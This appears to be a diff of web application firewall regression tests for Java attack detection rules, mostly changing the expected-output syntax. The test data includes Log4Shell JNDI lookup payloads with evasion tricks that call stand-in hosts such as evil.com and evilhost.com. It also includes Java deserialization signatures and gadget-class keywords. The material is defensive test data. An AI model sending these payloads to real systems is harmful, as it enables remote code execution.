"/get" version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: @@ -410,7 +432,8 @@ tests: data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: @@ -427,7 +450,8 @@ tests: data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages: @@ -444,4 +468,5 @@ tests: data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index a5af12663..8016cdce6 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri" - description: "Description" rule_id: 944200 tests: - test_id: 1 @@ -12,4 +11,5 @@ tests: port: 80 encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" output: - log_contains: "id \"944200\"" + log: + expect_ids: [944200] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index 01a32eea9..40cee4887 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "rO0ABQ=test" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "test=rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"rO0ABQ\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "{\"rO0ABQ\": \"test\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: @@ -278,7 +291,8 @@ tests: {"rO0ABQ": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: @@ -303,7 +317,8 @@ tests: {"rO0ABQ": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: @@ -328,7 +343,8 @@ tests: rO0ABQ -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: @@ -353,7 +369,8 @@ tests: rO0ABQ -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: @@ -372,7 +389,8 @@ tests: version: "HTTP/1.0" data: "test=KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: @@ -391,7 +409,8 @@ tests: version: "HTTP/1.0" data: "KztAAU=test" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: @@ -411,7 +430,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: @@ -431,7 +451,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: @@ -451,7 +472,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 23 desc: "XML element includes keyword KztAAU" stages: @@ -470,7 +492,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: @@ -489,7 +512,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: @@ -508,7 +532,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: @@ -527,7 +552,8 @@ tests: version: "HTTP/1.0" data: "KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: @@ -546,7 +572,8 @@ tests: version: "HTTP/1.0" data: "KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: @@ -565,7 +592,8 @@ tests: version: "HTTP/1.0" data: "test=KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: @@ -584,7 +612,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"KztAAU\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: @@ -603,7 +632,8 @@ tests: version: "HTTP/1.0" data: "{\"KztAAU\": \"test\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: @@ -628,7 +658,8 @@ tests: {"KztAAU": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: @@ -653,7 +684,8 @@ tests: {"KztAAU": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: @@ -678,7 +710,8 @@ tests: KztAAU -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: @@ -703,7 +736,8 @@ tests: KztAAU -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: @@ -722,7 +756,8 @@ tests: version: "HTTP/1.0" data: "test=Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: @@ -741,7 +776,8 @@ tests: version: "HTTP/1.0" data: "Cs7QAF=test" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: @@ -761,7 +797,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: @@ -781,7 +818,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: @@ -801,7 +839,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: @@ -820,7 +859,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: @@ -839,7 +879,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: @@ -858,7 +899,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: @@ -877,7 +919,8 @@ tests: version: "HTTP/1.0" data: "Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: @@ -896,7 +939,8 @@ tests: version: "HTTP/1.0" data: "Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: @@ -915,7 +959,8 @@ tests: version: "HTTP/1.0" data: "test=Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: @@ -934,7 +979,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Cs7QAF\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: @@ -953,7 +999,8 @@ tests: version: "HTTP/1.0" data: "{\"Cs7QAF\": \"test\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: @@ -978,7 +1025,8 @@ tests: {"Cs7QAF": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: @@ -1003,7 +1051,8 @@ tests: {"Cs7QAF": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: @@ -1028,7 +1077,8 @@ tests: Cs7QAF -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: @@ -1053,4 +1103,5 @@ tests: Cs7QAF -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 72414303e..5b4807405 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "runtime.clonetransformer=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 10 desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.clonetransformer\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.clonetransformer\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "runtime.forclosure=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: @@ -273,7 +286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: @@ -293,7 +307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: @@ -313,7 +328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: @@ -332,7 +348,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: @@ -351,7 +368,8 @@ tests: version: "HTTP/1.0" data: "runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: @@ -370,7 +388,8 @@ tests: version: "HTTP/1.0" data: "runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: @@ -389,7 +408,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 21 desc: "Content-Type application/json arg value includes keyword runtime.forclosure" stages: @@ -408,7 +428,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.forclosure\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: @@ -427,7 +448,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.forclosure\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: @@ -446,7 +468,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: @@ -465,7 +488,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatefactory=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: @@ -485,7 +509,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: @@ -505,7 +530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: @@ -525,7 +551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: @@ -544,7 +571,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: @@ -563,7 +591,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: @@ -582,7 +611,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: @@ -601,7 +631,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 32 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: @@ -620,7 +651,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.instantiatefactory\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 33 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: @@ -639,7 +671,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.instantiatefactory\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 34 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: @@ -658,7 +691,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.instantiatetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 35 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: @@ -677,7 +711,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatetransformer=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 36 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: @@ -697,7 +732,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 37 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: @@ -717,7 +753,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 38 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: @@ -737,7 +774,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 39 desc: "XML attribute value includes keyword runtime.instantiatetransformer" stages: @@ -756,7 +794,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 40 desc: "XML element value includes keyword runtime.instantiatetransformer" stages: @@ -775,7 +814,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 41 desc: "Nested XML element value includes keyword runtime.instantiatetransformer" stages: @@ -794,7 +834,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 42 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" stages: @@ -813,7 +854,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.instantiatetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 43 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: @@ -832,7 +874,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.instantiatetransformer\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 44 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: @@ -851,7 +894,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.instantiatetransformer\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 45 desc: "Argument test includes keyword runtime.invokertransformer" stages: @@ -870,7 +914,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.invokertransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 46 desc: "Argument name includes keyword runtime.invokertransformer" stages: @@ -889,7 +934,8 @@ tests: version: "HTTP/1.0" data: "runtime.invokertransformer=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 47 desc: "Cookie test includes keyword runtime.invokertransformer" stages: @@ -909,7 +955,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 48 desc: "Cookie name includes keyword runtime.invokertransformer" stages: @@ -929,7 +976,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 49 desc: "Request header test includes keyword runtime.invokertransformer" stages: @@ -949,7 +997,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 50 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: @@ -968,7 +1017,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 51 desc: "XML element value includes keyword runtime.invokertransformer" stages: @@ -987,7 +1037,8 @@ tests: version: "HTTP/1.0" data: "runtime.invokertransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 52 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: @@ -1006,7 +1057,8 @@ tests: version: "HTTP/1.0" data: "runtime.invokertransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 53 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: @@ -1025,7 +1077,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.invokertransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 54 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: @@ -1044,7 +1097,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.invokertransformer\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 55 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: @@ -1063,7 +1117,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.invokertransformer\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 56 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: @@ -1082,7 +1137,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.prototypeclonefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 57 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: @@ -1101,7 +1157,8 @@ tests: version: "HTTP/1.0" data: "runtime.prototypeclonefactory=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 58 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: @@ -1121,7 +1178,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 59 desc: "Cookie name includes keyword runtime.prototypeclonefactory" stages: @@ -1141,7 +1199,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 60 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: @@ -1161,7 +1220,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 61 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: @@ -1180,7 +1240,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 62 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: @@ -1199,7 +1260,8 @@ tests: version: "HTTP/1.0" data: "runtime.prototypeclonefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 63 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: @@ -1218,7 +1280,8 @@ tests: version: "HTTP/1.0" data: "runtime.prototypeclonefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 64 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: @@ -1237,7 +1300,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.prototypeclonefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 65 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: @@ -1256,7 +1320,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.prototypeclonefactory\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 66 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: @@ -1275,7 +1340,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.prototypeclonefactory\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 67 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: @@ -1294,7 +1360,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.prototypeserializationfactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 68 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: @@ -1313,7 +1380,8 @@ tests: version: "HTTP/1.0" data: "runtime.prototypeserializationfactory=test" output: - log_contains: "id \"944240\"" + log: + 